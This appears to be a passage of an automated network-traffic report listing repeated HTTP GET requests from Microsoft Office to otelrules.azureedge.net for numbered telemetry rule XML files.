              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
